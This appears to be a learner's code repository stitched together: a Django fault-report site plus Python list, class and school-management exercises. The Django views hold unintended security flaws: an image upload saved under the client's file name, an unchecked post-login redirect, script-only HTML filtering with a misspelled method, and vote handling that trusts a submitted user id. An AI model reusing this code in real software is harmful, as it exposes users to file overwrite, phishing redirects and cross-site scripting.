class LoginView(views.View): ''' 如果用户发送的是get就返回登录页面 如果是post请求,先获取用户想访问那个页面用next,然后让他输入用户名密码还有验证码,先验证 用户名和密码,然后再判断验证码是否正确,如果都是正确的,就跳转到用户访问的那个页面 ''' def get(self, request): return render(request, "login.html") def post(self, request): next_url = request.GET.get("next", "/index/") username = request.POST.get("username") pwd = request.POST.get("<PASSWORD>") v_code = request.POST.get("vcode", "").upper() # 如果用户不写验证码就是空 if v_code == request.session.get("v_code"): user_obj = auth.authenticate(username=username, password=pwd) if user_obj: auth.login(request, user_obj) # auth认证登录 return redirect(next_url) else: return render(request, "login.html", {"error_msg": "用户名或密码错误"}) else: return render(request, "login.html", {"error_msg": "验证码错误"}) def logout(request): ''' 注销用auth模块,然后跳转到登录页面 :param request: :return: ''' auth.logout(request) return redirect("/login/") # 首页 def index(request, *args): ''' index可以传参数类似 --/lob/视频/--格式的参数 args[1]代表第二个参数,0代表第一个 首先分别取到业务,标签,时间的个数,然后点击不同的业务,标签,或时间跳转属于自己的内容界面 时间这里加上了try except捕获异常,因为怕用户输入的时间日期,不符合格式,如果没有这个日期则返回空 统计数量用的是orm的聚合查询需要先导入count :param request: :param args: :return: ''' # 取到所有的故障总结 report_list = models.FaultReport.objects.all() # 分页功能 total_count = report_list.count() # 总数量 current_page = request.GET.get("page") # 当前页 page_obj = mypage.MyPage(current_page, total_count, url_prefix="index") page_html = page_obj.page_html() # 显示页码的代码 range = report_list[page_obj.start:page_obj.end] # 如果有参数,并且参数长度是2 if args and len(args) == 2: # 进入细分查询 if args[0] == "lob": # 按业务线查询, report_list = report_list.filter(lob__title=args[1]) # args[1]指的是视频等业务 total_count = report_list.count() # 总数量 current_page = request.GET.get("page") # 当前页 page_obj = mypage.MyPage(current_page, total_count, url_prefix="fault-report/lob/args[1]") page_html = page_obj.page_html() # 显示页码的代码 try: range = report_list[page_obj.start:page_obj.end] except Exception: return HttpResponse("此选项没有内容") elif args[0] == "tag": # 是按照标签查询 report_list = report_list.filter(tags__title=args[1]) 
total_count = report_list.count() # 总数量 current_page = request.GET.get("page") # 当前页 page_obj = mypage.MyPage(current_page, total_count, url_prefix="fault-report/tag/args[1]") page_html = page_obj.page_html() # 显示页码的代码 try: range = report_list[page_obj.start:page_obj.end] except Exception: return HttpResponse("此选项没有内容") else: # 按照日期(年月)来查询 try: year, month = args[1].split("-") # 以-切割,取出年和月 print(year) report_list = report_list.filter(create_time__year=year, create_time__month=month) total_count = report_list.count() # 总数量 current_page = request.GET.get("page") # 当前页 page_obj = mypage.MyPage(current_page, total_count, url_prefix="fault-report/archive/args[1]") page_html = page_obj.page_html() # 显示页码的代码 try: range = report_list[page_obj.start:page_obj.end] except Exception: return HttpResponse("此选项没有内容") except Exception: report_list = [] # 聚合查询业务线 ,title是LOB表里的title,获取业务线后面括号里的数字 lob_list = models.LOB.objects.all().annotate(num=Count("faultreport")).values("title", "num") # 正常查询 # lob_list = models.LOB.objects.all() # 取到所有标签 # tag_list=models.Tag.objects.all() # 分组获取标签,获取标签分类括号里面的数字 tag_list = models.Tag.objects.all().annotate(num=Count("faultreport")).values("title", "num") # 拿到一个日期归档数据 archive_list = models.FaultReport.objects.all().extra( select={"ym": "strftime('%%Y-%%m', create_time)"} ).values("ym").annotate(num=Count("id")).values("ym", "num") # return render(request, "index.html", locals(),{"report_list":range}) return render(request, "index.html", {"report_list": range, "page_html": page_html, "lob_list": lob_list, "tag_list": tag_list, "archive_list": archive_list}) # 验证码路径 def vcode(request): from PIL import Image, ImageDraw, ImageFont # 导入绘图模块 # 定义一个生成随机颜色代码的函数 def random_color(): return random.randint(0, 255), random.randint(0, 255), random.randint(0, 255) # 创建一个随机背景颜色的图片对象 image_obj = Image.new( "RGB", (250, 35), # 背景图片的长和宽 (255, 255, 140) ) # 在该图片对象上生成一个画笔对象 draw_obj = ImageDraw.Draw(image_obj) # 加载一个字体对象 font_obj = 
ImageFont.truetype('static/font/kumo.ttf', 28) # 字体大小 tmp = [] for i in range(5): l = chr(random.randint(97, 122)) # 生成随机的小写字母 u = chr(random.randint(65, 90)) # 生成随机的大写字母 n = str(random.randint(0, 9)) # 生成一个随机的数字 # 从上面三个随机选一个 r = random.choice([l, u, n]) # 将选中过的那个字符写到图片上 draw_obj.text((30 * i + 30, 0), r, fill=random_color(), font=font_obj) # text指定的是从那开始写位置,fill是字体颜色 tmp.append(r) v_code = "".join(tmp).upper() # 将生成的验证码保存 request.session["v_code"] = v_code # 直接在内存中保存图片替代io操作 from io import BytesIO f1 = BytesIO() image_obj.save(f1, format="PNG") # 将背景图片保存到f1里面 img_data = f1.getvalue() # 去f1取图片 return HttpResponse(img_data, content_type="image/png") # 注册 class RegisterView(views.View): ''' 如果是get请求,就返回注册页面,用的form写的注册页面,先导入刚才写的forms模块,然后调用RggisterForm 如果是post请求(就是提交请求),form_obj获取到用户填的所有内容,然后去校验数据格式是否正确,如果没问题,就去 数据库里面创建数据,创建之前,要先删除re_password这个字段,因为数据库里没有这个字段 然后接受头像文件,需要用request.FILES,去获取 最后去数据库保存,需要把你的普通数据和头像数据分开来存储。 注册成功之后,就跳转到登录界面,否则就报报错信息返回到页面上面 ''' def get(self, request): form_obj = forms.RegisterForm() return render(request, "register.html", locals()) def post(self, request): res = {"code": 0} form_obj = forms.RegisterForm(request.POST) if form_obj.is_valid(): # 数据没问题,去数据库创建记录 form_obj.cleaned_data.pop("re_password") # 头像数据,文件对象 avatar_obj = request.FILES.get("avatar") # 头像文件保存到数据库,如果你的models里面写的这个字段FileField,就会自动写在服务器上面 models.UserInfo.objects.create_user(**form_obj.cleaned_data, avatar=avatar_obj) res["url"] = "/login/" else: # 数据有问题 res["code"] = 1 res["error"] = form_obj.errors return JsonResponse(res) # 编辑注册信息 def edit_register(request): user_obj = models.UserInfo.objects.filter(username=request.user).first() # 获取你要编辑的用户 if request.method == "POST": # 获取新的字段 new_name = request.POST.get("name") new_phone = request.POST.get("phone") new_email = request.POST.get("email") avatar_obj = request.FILES.get("avatar") # print(avatar_obj) # 数据库更改字段 user_obj.username = new_name user_obj.phone = new_phone user_obj.email = new_email user_obj.avatar = avatar_obj 
print(user_obj.avatar) user_obj.save() return redirect("/fault-report/info/") return render(request, "edit_register.html", locals()) def change_password(request): ''' 更改密码 首先获取用户名,当用户要改密码的时候让他先输入旧密码,然后在输入两次新密码,当点击提交的时候,会先检查旧密码 是否正确,如果是正确的就检查两次输入的新密码是否正确,如果两次新密码输入正确就保存,然后跳转到登录界面。如果旧密码不正确, 就提示错误。,两次新密码不一致也提示错误 :param request: :return: ''' # 获取用户名 user = auth.get_user(request) state = None if request.method == 'POST': old_password = request.POST.get('old_password', '') new_password = request.POST.get('new_password', '') repeat_password = request.POST.get('repeat_password', '') if user.check_password(old_password): if not new_password: state = 'empty' elif new_password != repeat_password: state = '两次密码不一致' return render(request, "change_password.html", {"error_new": state, "v": user}) else: user.set_password(new_password) user.save() return redirect("/login/") else: state = '原始密码不对' return render(request, "change_password.html", {"error_old": state, "v": user}) return render(request, 'change_password.html', {"v": user}) # 个人中心 @login_required # 用auth自带的装饰器,需要去setting.py里面设置一下路径 def info(request): # 把当前这个用户发布的所有内容故障总结展示出来 report_list = models.FaultReport.objects.filter(user=request.user) return render(request, "info.html", locals()) # 故障详情页面 def report_detail(request, report_id): # 根据id值去数据库中找到对应的那个故障总结 report = models.FaultReport.objects.filter(id=report_id).first() if not report: return HttpResponse("404") return render(request, "report_detail.html", {"report": report}) # 点赞 def updown(request): res = {"code": 0} # print(request.user) #获取用户名 # print(request.user.username) #获取用户名 # 获取用户id user_id = request.POST.get("user_id") # 获取点赞文章id report_id = request.POST.get("report_id") # 获取是点反对还是支持 # is_up=request.POST.get("report_id") # 获取的true和false是字符串,要转换成python里面的true和false is_up = True if request.POST.get("is_up") == "true" else False # 2. 
每个人只能给一篇文章点一次推荐或者点一次反对 等于号前面的字段是updonw数据库里面的字段 is_exist = models.UpDown.objects.filter(user_id=user_id, fault_report_id=report_id).first() if models.FaultReport.objects.filter(user_id=user_id, id=report_id): # 如果是自己给自己点赞 res["code"] = 1 res["msg"] = "不能支持自己的文章" if is_up else "不能反对自己的文章" elif is_exist: # 如果有记录就代表以及点过了 res["code"] = 1 res["msg"] = "你已经推荐过" if is_exist.is_up else "你已经反对过" else: # 数据没问题,去数据库里面创建数据 # 因为点赞表创建了新纪录同时还要更新故障总结表的点赞字段,涉及到事务操作 with transaction.atomic(): # 创建点赞记录去updown表里面 models.UpDown.objects.create( user_id=user_id, fault_report_id=report_id, is_up=is_up ) # 去更新对应的故障总结里面的点赞数 if is_up: # 如果为真,点赞 # 先找到这篇文章,然后去更新她的up_count字段 models.FaultReport.objects.filter(id=report_id).update(up_count=F('up_count') + 1) else: models.FaultReport.objects.filter(id=report_id).update(down_count=F("down_count") + 1) # 事务操作结束 res["msg"] = "支持成功" if is_up else "反对成功" return JsonResponse(res) # 评论 def comment(request): ''' 首先取到由ajax发送过来的评论数据,包括文章id,评论内容,父评论,如果没有父id,就创建新的一条评论, 如果有父id,就创建一个子评论,并且同时去更新faultreport里面的评论数 :param request: :return: ''' res = {"code": 0} # 取到用户发送的评论数据,下面这三个数据是ajax给发送过来的 report_id = request.POST.get("report_id") content = request.POST.get("content") parent_id = request.POST.get("parent_id", None) # 获取父评论id # 去数据库创建一条新的评论 with transaction.atomic(): if not parent_id: comment_obj = models.Comment.objects.create( fault_report_id=report_id, # 故障id user=request.user, # 用户 content=content, # 评论的内容 ) # 否则就创建一条子评论 else: comment_obj = models.Comment.objects.create( fault_report_id=report_id, user=request.user, content=content, parent_comment_id=parent_id, ) # 同时去更新评论数 models.FaultReport.objects.filter(id=report_id).update(comment_count=F("comment_count") + 1) # 把res返回给ajax,然后ajax根据返回的内容,自动刷新评论的内容,然后显示在网页上 res["data"] = { "id": comment_obj.id, "n": models.Comment.objects.filter(fault_report_id=report_id).count(), # 有多少条数据就有几楼 "create_time": comment_obj.create_time.strftime("%Y-%m-%d %H:%M:%S"), "user": comment_obj.user.username, "content": 
comment_obj.content } # print(res) return JsonResponse(res) # 把res的结果返回给ajax # 添加故障 def add_report(request): if request.method == "POST": content = request.POST.get("content") # 获取文章内容 soup = BeautifulSoup(content, "html.parser") print(soup) # 把提交的内容包含有script的标签清洗掉 for i in soup.find_all("script"): # 遍历所有的script标签,删除掉 i.decompost() with transaction.atomic(): # 先创建一条故障总结记录 report_obj = models.FaultReport.objects.create( title=request.POST.get("title"), # 简介 desc=soup.text[0:150], # 只去html代码的文本内容 lob_id=request.POST.get("lob"), user=request.user ) # 创建一条故障总结详情记录 models.FaultDetail.objects.create( content=soup.prettify(), # 格式化完整的html内容 fault_id=report_obj.id ) return redirect("/fault-report/info/") lobs = models.LOB.objects.all() # 业务线 return render(request, "add_report.html", locals()) # 编辑故障 def edit_report(request, report_id): if request.method == "POST": new_title = request.POST.get("title") new_lob_id = request.POST.get("lob") new_content = request.POST.get("content") soup = BeautifulSoup(new_content, "html.parser") # 把提交的内容包含有script的标签清洗掉 for i in soup.find_all("script"): # 遍历所有的script标签,删除掉 i.decompost() with transaction.atomic(): report_obj = models.FaultReport.objects.filter(id=report_id).update( title=request.POST.get("title"), # 简介 desc=soup.text[0:150], # 只去html代码的文本内容 lob_id=request.POST.get("lob"), user=request.user ) # 创建一条故障总结详情记录,当你用了.first的时候不能用.update了,queeyset才可以用.update models.FaultDetail.objects.filter(fault_id=report_id).update( content=soup.prettify(), # 格式化完整的html内容 fault_id=report_id ) return redirect("/fault-report/info/") report_obj = models.FaultReport.objects.filter(id=report_id).first() lobs = models.LOB.objects.all() return render(request, "edit_report.html", locals()) # 删除故障信息 def del_report(request, report_id): with transaction.atomic(): models.FaultReport.objects.filter(id=report_id).delete() # 创建一条故障总结详情记录 models.FaultDetail.objects.filter(fault_id=report_id).delete() return redirect("/fault-report/info/") # 富文本编辑器上传图片的视图 def 
upload_img(request): print(request.FILES) res = {"error": 0} # 这是固定写法,必须用error file_obj = request.FILES.get("imgFile") file_path = os.path.join("upload", "report_images", file_obj.name) # 将文件保存在本地 with open(file_path, "wb") as f: for chunk in file_obj.chunks(): f.write(chunk) # 将上传文件的url返回给富文本编辑器 res["url"] = "/media/report_images/{}".format(file_obj.name) return JsonResponse(res) <file_sep>/day2/day4作业.py #li = ['alex','wusie','eric','rain','alex'] ''' #1)计算列表的长度并输出 print(len(li)) #2)列表中追加元素’seven’,并输出添加后的列表 li.append('senven') print(li) #33)请在列表的第1个位置插入元素’Tony’,并输出添加后的列表 li.insert(0,'Tony') print(li) #4)请修改列表第2个位置的元素为’Kelly’,并输出修改后的列表 li[1] = 'kelly' print(li) #5)请将列表l2=[1,’a’,3,4,’heart’]的每一个元素添加到列表li中,一行代码实现,不允许循环添加。 l2=[1,'a',3,4,'heart'] li.extend(l2) print(li) ''' #7)请删除列表中的元素’eric’,并输出添加后的列表 # li.remove('eric') # print(li) #8)请删除列表中的第2个元素,并输出删除的元素和删除元素后的列表 # print(li.pop(2)) # print(li) #9)请删除列表中的第2至4个元素,并输出删除元素后的列表 # del li [1:4] # print(li) #10)请将列表所有得元素反转,并输出反转后的列表 # li.reverse() # print(li) #11)请计算出‘alex’元素在列表li中出现的次数,并输出该次数。 #print(li.count('alex')) ''' lis= [2,3,'k',['qwe',20,['k1',['tt',3,'1']],89],'ab','adv'] #1)将列表lis中的’tt’变成大写(用两种方式)。 # print(lis[3]) # print(lis[3][2][1][0].upper()) ##第一种 # lis[3][2][1][0] = "TT" ##第二种 # print(lis[3][2][1][0]) #2)将列表中的数字3变成字符串’100’ lis[1] = 100 print(lis[1]) #3)将列表中的字符串’1’变成数字101 #第一种方法 # lis[3][2][1][2] = "101" # print(lis[3][2][1][2]) #第二种方法: lis[3][2][1][2] = int(lis[3][2][1][2]) + 100 print(lis[3][2][1][2]) ''' # li = ['alex','eric','rain'] # #利用下划线将列表的每一个元素拼接成字符串"alex_eric_rain" # b = "_".join(li) # print(b) ''' ##7循环打印列表中的每个元素,遇到列表则再循环打印出它里面的元素。 li = [1,3,4,'alex',[3,7,8,'taibai'],5,'ritian'] for i in li: #print(type(i)) print(i) if type(i) == list: for g in i: print(g) ''' ''' ##5 替换敏感词汇 li = ["苍老师", "东京热","武藤兰", "波多野结衣"] new_list=[] m = input("请输入你的评论:") for i in li: if m == i: print("你输入的有敏感词汇") m = m.replace(i,'...') new_list.append(m) else: new_list.append(m) print(new_list) ''' ''' #6 
查找列表li中的元素,移除每个元素的空格,并找出以’A’或者’a’开头,并以’c’结尾的所有元素, # 并添加到一个新列表中,最后循环打印这个新列表。 li = ['taibai','alex','ABC','egon', 'Ritian','Wusir', ' aqc'] new_list = [] for i in li: b = (i.strip()) if b.startswith("a") or b.startswith("A"): if b.endswith('c'): new_list.append(b) print(new_list) '''<file_sep>/day2/小数据池.py #赋值运算,它们共用一个列表 # a = [1,2,3] # b = a # a.append(666) # print(a,b) #浅copy #对于浅copy来说,第一层创建的是新的内存地址,而从第二层开始, # 指向的都是同一个内存地址,所以,对于第二层以及更深的层数来说,保持一致性 l1 = [1,2,3] l2 = l1.copy() l1.append(666) print(l1,l2) print(id(l1),id(l2)) l1 = [1,2,3,[22,33]] ##这里因为[22,33]属于第二层,所以两个列表都一样 l2 = l1.copy() l1[-1].append(666) print(l1,l2) print(id(l1[-1]),id(l2[-1])) #深copy 对于深copy来说,两个是完全独立的,改变任意一个的任何元素(无论多少层),另一个绝对不改变。 import copy l1 = [1,2,3,[22,33]] l2 = copy.deepcopy(l1) l1[-1].append(666) print(l1,l2) print(id(l1[-1]),id(l2[-1])) # # id == is a = 'alex' b = 'alex' print(a == b) # 数值 print(a is b) # 内存地址 print(id(a)) #python中 有小数据池的概念。 # int -5 ~256 的相同的数全都指向一个内存地址,节省空间。 # str:s = 'a' * 20 以内都是同一个内存地址 #只要字符串含有非字母元素,那就不是一个内存地址 <file_sep>/模板/auto - 2 - 固定二级菜单示例/auto - 2 - 固定二级菜单示例/web/views/home.py from django.shortcuts import render from web import models # from django.conf import settings def add_user(request): # menus = settings.MENU_LIST return render(request, 'add_user.html') def add_order(request): # menus = settings.MENU_LIST return render(request, 'add_order.html') def userlist(request): data=models.User.objects.all return render(request, 'userlist.html',{'user_list':data}) def orderlist(request): return render(request, 'orderlist.html') <file_sep>/day8/模块/my_module.py print('my module') money=1000 def func(): print('in func',money) func()<file_sep>/day6/4.初识类的语法.py # 类 : 具有相同属性和相同动作的一类事物 组成一个类,如人类 # 对象 : 具体的某一个具有实际属性 和具体动作的一个实体。如蜘蛛侠就是一个对象 # 类是抽象的 # 对象是具体的 # 类被创造出来 就是模子 是用来描述对象的 # class 类名: # 静态属性 = 123 # def 动态属性(self): # # 在类中的方法的一个默认的参数,但也只是一个形式参数,约定必须叫self # print('-->',self) # # # 只要是写在类名中的名字 不管是变量还是函数名 都不能在类的外部直接调用 # # 只能通过类名来使用它 # # 类名的第一个功能是 —— 查看静态属性 # 
print(类名.静态属性) # 查看 # 类名.静态属性 = 456 # 修改 # print(类名.静态属性) # 类名.静态属性2 = 'abc'# 增加 # print(类名.静态属性2) # # del 类名.静态属性2 # # print(类名.静态属性2) # print(类名.__dict__) # 类中必要的默认值之外 还记录了程序员在类中定义的所有名字 # 类名可以查看某个方法,但是一般情况下 我们不直接使用类名来调用方法 # print(类名.动态属性) # 类名.动态属性(1) # 类的第二个功能是 —— 实例化(创造对象) # class Person:pass # # alex = Person() # 对象 = 类名() # print(alex) # object # print(Person) # alex name hp dps bag sex # print(alex.__dict__) # # alex.__dict__['name'] = 'alex' # # alex.__dict__['sex'] = '不详' # # alex.__dict__['hp'] = 250 # # alex.__dict__['dps'] = 5 # # alex.__dict__['bag'] = [] # # print(alex.__dict__) # alex.name = 'alex' # 给alex对象添加属性 # alex.hp = 250 # alex.dps = 5 # alex.sex = '不详' # alex.bag = [] # print(alex.__dict__) # class Person: # def __init__(self,name,hp,dps,sex): # self.name = name # self.hp = hp # self.dps = dps # self.sex = sex # self.bag = [] # # alex = Person('alex',250,5,'N/A') # print('alex : ',alex) # print(alex.__dict__) # print(alex.name) # 为什么会执行init中的内容? # self到底是什么? # 实例化的过程 # 类名()就是实例化 # 在实例化的过程中 发生了很多事情是外部看不到的 # 1.创建了一个对象 # 2.自动调用__init__方法 # 这个被创造的对象会被当做实际参数传到__init__方法中,并且传给第一个参数self # 3.执行init方法中的内容 # 4.自动的把self作为返回值 返回给实例化的地方 # class Person: # def __init__(self,name,hp,dps,sex): # self.name = name # self.hp = hp # self.dps = dps # self.sex = sex # self.bag = [] # def attack(self,dog): # dog.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, dog.name, dog.name, self.dps, dog.hp)) # # class Dog: # def __init__(self,name,kind,hp,dps): # self.name = name # self.hp = hp # self.dps = dps # self.kind = kind # # def bite(self,person): # person.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, person.name, person.name, self.dps, person.hp)) # # alex = Person('alex',250,5,'N/A') # ha2 = Dog('哈士奇','藏獒',15000,200) # ha2.bite(alex) # 简化的方式 # alex.attack(ha2) # Person.attack(alex) # alex.attack(ha2) # Person.attack(alex) # print(alex.attack(ha2)) # Person.attack(alex) # print(ha2.hp) # print('alex : ',alex) # print(alex.__dict__) # 
print(alex.name) # 对象名.方法名 相当于调用一个函数,默认把对象名作为第一个参数传入函数 # 剩余的其他参数根据我的需求可以随意传 # 已知半径 计算圆形的面积和周长 面向对象的思想完成 # 类 圆 # 属性 半径 # 方法 计算面积 计算周长 计算直径 # pi * r ** 2 # 2*pi*r # from math import pi # class Circle: # def __init__(self,r): # self.r = r # def area(self): # return pi * self.r ** 2 # def perimeter(self): # return self.r *pi * 2 # def r2(self):pass # c1 = Circle(5) # 圆形的周长和面积 # 正方形的周长和面积 # # 每一个角色都有属于自己的 属性 和 方法 # 高可扩展性 可读性 规范性 # 结局不可控 # 类有自己的命名空间 # 对象也有自己的命名空间 # 对象能访问类的命名空间? # 类不能访问对象的命名空间? # class Person: # COUNTRY = '中国人' # 静态属性 # def __init__(self,name): # self.name = name # def eat(self): # print('%s在吃泔水'%self.name) # # alex = Person('alex') # egon = Person('egon') # # print(alex.name) # print(egon.name) # print(alex.COUNTRY) # alex.eat() # Person.eat(alex) # alex ---> Person # 当一个类在创建一个实例的时候 就产生了一个这个实例和类之间的联系 # 可以通过实例 对象 找到实例化它的类 # 但是 类不能找到它的实例化 class Person: COUNTRY = ['中国人'] # 静态属性 Country = '中国人' # 静态属性 def __init__(self,name): self.name = name def eat(self): print('%s在吃泔水'%self.name) alex = Person('alex') egon = Person('egon') # print(alex.Country) # alex.Country = '印度人' # print(alex.Country) # print(egon.Country) # print(Person.Country) # alex.COUNTRY[0] = '印度人' # print(alex.COUNTRY) # print(egon.COUNTRY) # print(Person.COUNTRY) # alex.COUNTRY = ['印度人'] # print(egon.COUNTRY) # print(Person.COUNTRY) # 在访问变量的时候,都先使用自己命名空间中的,如果自己的空间中没有,再到类的空间中去找 # 在使用对象修改静态变量的过程中,相当于在自己的空间中创建了一个新的变量 # 在类的静态变量的操作中 应该使用类名来直接进行操作 就不会出现乌龙问题 # 创建一个类 能够自动计算这个类有创建了多少个实例 # class Foo: # count = 0 # def __init__(self): # Foo.count += 1 # # f1 = Foo() # print(Foo.count) # [Foo() for i in range(10)] # print(Foo.count)<file_sep>/day2/05 tuple.py tu = (11,2,True,[2,3,4],'alex') #查找 for i in tu: print (i) #切片 print (tu[1]) print (tu[:3:2]) print(tu.index(True)) #count 统计 print(tu.count(2)) #len长度 print(len(tu)) #添加 tu[-2].append('99') print (tu)<file_sep>/day6/作业/学校管理系统.py import json import sys import time import os class School: #学校类 def __init__(self,name): self.name=name def 
creat_class(self): #创建班级 print('欢迎创建班级'.center(50,'#'),'\n') class_name=input("请输入班级名称") class_obj=Classroom(class_name) print("创建班级成功".center(50, '-'), '\n') class_dict = { "班级名称": class_name, } if schoolid == school1: f=open('bj_class_info','a') f.write(json.dumps(class_dict,ensure_ascii=False)+'\n') f.seek(0,2) control_view() else: f = open('sh_class_info', 'a') f.write(json.dumps(class_dict, ensure_ascii=False)+'\n') f.seek(0,2) control_view() def show_class(self):#查看班级 if os.path.isfile('bj_class_info') and os.path.isfile('sh_class_info'): if schoolid == school1: f=open('bj_class_info','r') f.seek(0) print(f.read()) control_view() else: f = open('sh_class_info', 'r') f.seek(0) print(f.read()) control_view() else: print("你还没有创建班级") def creat_course(self): # 创建课程 print('欢迎创建课程'.center(50, '#'), '\n') course_name=input("请输入课程名称") course_time=input("请输入课程周期") course_price=input("请输入课程价格") course_obj=Course(course_name,course_time,course_price) print("创建课程成功:" '\n') courses[course_name]=course_obj course_dict ={"课程名称":course_name, "课程周期":course_time, "课程价格":course_price } if schoolid == school1: f = open('bj_course_info', 'a') f.write(json.dumps(course_dict, ensure_ascii=False)+'\n') f.seek(0,2) control_view() else: f = open('sh_course_info', 'a') f.write(json.dumps(course_dict, ensure_ascii=False)+'\n') f.seek(0,2) control_view() def show_course(self): #查看课程 if os.path.isfile('bj_course_info') and os.path.isfile('sh_course_info'): if schoolid == school1: f = open('bj_course_info', 'r') f.seek(0) print(f.read()) control_view() else: f = open('sh_course_info', 'r') f.seek(0) print(f.read()) control_view() else: print("还没有创建课程") control_view() def create_teacher(self): print("创建讲师".center(50,'#')) teacher_name=input("请输入讲师姓名:") teacher_passwd=input("请输入讲师密码:") teacher_age=input("请输入讲师年龄:") teacher_school=input("请输入讲师所在学校:") teacher_class=input("请输入讲师所在班级:") teacher_course=input("请输入讲师教授的课程:") 
teacher_obj=(teacher_name,teacher_passwd,teacher_age,teacher_school,teacher_class,teacher_course) print("创建讲师成功:".center(50, '-'), '\n') teachers[teacher_name] = teacher_obj teachers_dic={ "讲师姓名": teacher_name, "讲师密码": <PASSWORD>_passwd, "讲师年龄": teacher_age, "讲师所在学校": teacher_school, "讲师教授课程": teacher_course, "讲师所在班级": teacher_class, } if schoolid == school1: f = open('bj_teacher_info', 'a') f.write(json.dumps(teachers_dic, ensure_ascii=False)+'\n') f.seek(0,2) control_view() else: f = open('sh_teacher_info', 'a') f.write(json.dumps(teachers_dic, ensure_ascii=False)+'\n') f.seek(0,2) control_view() def show_teacher(self): #查看讲师 if os.path.isfile('bj_teacher_info') and os.path.isfile('sh_teacher_info'): if schoolid == school1: f = open('bj_teacher_info', 'r') f.seek(0) print(f.read()) control_view() else: f = open('sh_teacher_info', 'r') f.seek(0) print(f.read()) control_view() else: print("你还没有创建老师") control_view() class Classroom: #班级类 def __init__(self,class_name): self.name=class_name class Course: #课程类 def __init__(self,course_name,course_time,course_price): self.course_name=course_name self.course_time=course_time self.course_price=course_price class Person: def __init__(self,name,passwd,age): self.name=name self.passwd=<PASSWORD> self.age=age class Teacher(Person): def __init__(self,name,passwd,age,teacher_school,teacher_class,teacher_course): Person.__init__(self,name,passwd,age) self.teacher_school=teacher_school self.teacher_course=teacher_course self.teacher_class=teacher_class ##存贮用户登录状态的 user_status = { 'username': None, 'status': False } ##登录函数 def wrapper(f2): def inner(): func1 = str(inner) func2 = str(quit) if func2 in func1: exit() if user_status.get('status'): f2() ##就是被装饰的函数 else: print('\033[1;33m欢迎来到教学管理系统.\033[0m'.center(50,"#"),"\n") print('\033[1;33m注意,请先登录,再操作,超过三次锁定用户\033[0m') b = 0 while b < 3: username = input("\033[1;33m请输入你的用户名:\033[0m") password = input("\033[1;33m请输入你的密码:\033[0m") with open('db\info',encoding='utf-8')as f1: for i in 
f1: a = (i.split()) if a[0] == username and a[1] == password and a[2] == 'student': user_status['status'] = True print("欢迎%s回来" %(username)) select_school() student_view() return username elif a[0] == username and a[1] == password and a[2] == 'teacher': user_status['status'] = True print("欢迎%s回来" %(username)) select_school() teacher_view() return username elif a[0] == username and a[1] == password and a[2] == 'manage': user_status['status'] = True print("欢迎%s回来" %(username)) select_school() control_view() return username else: print("登录失败,请重新登录,你已经用了%s次" % (b+1)) b += 1 return inner @wrapper def login(): ##这里重新定义一个login函数,因为你如果直接执行装饰器会报错,因为里面传了一个参数 pass #@wrapper def control_view():#管理视图 choice_id = input("\033[1;32m*************************请选择功能********************\n" "0.查看班级" "1.创建班级" "2.创建课程" "3.查看课程" "4.创建讲师" "5.查看讲师" "6.退出\n: \033[0m") if choice_id =='0': schoolid.show_class() if choice_id == '1': schoolid.creat_class() elif choice_id == '2': schoolid.creat_course() elif choice_id == '3': schoolid.show_course() elif choice_id == "4": schoolid.create_teacher() elif choice_id == '5': schoolid.show_teacher() # elif choice_id == '6': # select_school() elif choice_id == '6': sys.exit() def student_view(): #学生视图 choice_id = input("\n*************************学生功能********************\n" "0.查看班级" "1.查看课程") if choice_id =='0': schoolid.show_class() elif choice_id == '1': schoolid.show_course() def teacher_view(): #老师视图 choice_id = input("\n*************************讲师功能********************\n" "0.查看班级" "1.查看课程" "2.退出\n: ") if choice_id == '0': schoolid.show_class() elif choice_id == '1': schoolid.show_course() elif choice_id =='2': sys.exit() #@wrapper def select_school(): global schoolid choice_school_id = input("\033[1;32m*************************请选择学校********************\n" "a.北京校区" "b.上海校区" "q.退出\n: \033[0m") if choice_school_id == 'a': schoolid = school1 elif choice_school_id == 'b': schoolid = school2 elif choice_school_id == 'q': sys.exit() else: 
print("\033[4;35m请输入真确的选项:\033[0m") #@wrapper def select_fun(): # 选择功能 global choice_id choice_id = input("\n*************************请选择角色********************\n" "1.学员视图" "2.讲师视图" "3.管理视图" "4.返回\n: ") if choice_id == '1': student_view() elif choice_id == '2': teacher_view() elif choice_id == '3': control_view() # print("你好11111") elif choice_id == '4': select_school() # else: # return #time.sleep(2) #@wrapper def main(): while True: login() #选择学校 # while True: # login()#选择功能 if __name__ == '__main__': classrooms = {} teachers = {} courses = {} students = {} school1 = School('昌平校区') school2 = School('浦东校区') main() <file_sep>/student_guanli_system/core/mypickle.py import pickle class MyPickle: def __init__(self,filepath): self.filepath = filepath def dump(self,sch_obj): with open(self.filepath,'ab') as f: pickle.dump(sch_obj,f) def load(self): with open(self.filepath, 'rb') as f: while True: try: obj = pickle.load(f) yield obj except Exception: break def get_item(self,num): with open(self.filepath, 'rb') as f: while num>0: try: obj = pickle.load(f) except Exception: break num -=1 return obj<file_sep>/day17/lianxi/lianxi/urls.py """lianxi URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.11/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin from app01 import views urlpatterns = [ url(r'^admin/', admin.site.urls), url(r'^publisher_list/$', views.publisher_list,name="list"), # 动态传参-FBV # url(r'^edit_publisher/(\d+)/$', views.edit_publisher), # 动态传参-CBV url(r'^edit_publisher/(?P<edit_id>\d+)/$', views.EditPublisher.as_view(), name="wusir"), # url传参 # url(r'^edit_publisher/$', views.edit_publisher), # 上传文件 url(r'^upload/$', views.upload.as_view()), # 测试返回Json格式数据 url(r'^json_test/$', views.JsonTest.as_view()), # 测试模板语法 url(r'^template_test/$', views.template_test), # 测试跨站请求伪造 (CSRF) url(r'^csrf_test/$', views.csrf_test), # 外键增删改查 # 查看列表 url(r'^book_list/$', views.book_list), # 增加 url(r'^add_list/$', views.add_list,name="add_book"), # 删除 url(r'^del_book/(?P<pk>\d+)$', views.del_book, name="del_book"), # 编辑 url(r'^edit_book/(?P<pk>\d+)$', views.edit_book, name="edit_book"), # 登录设置cookie 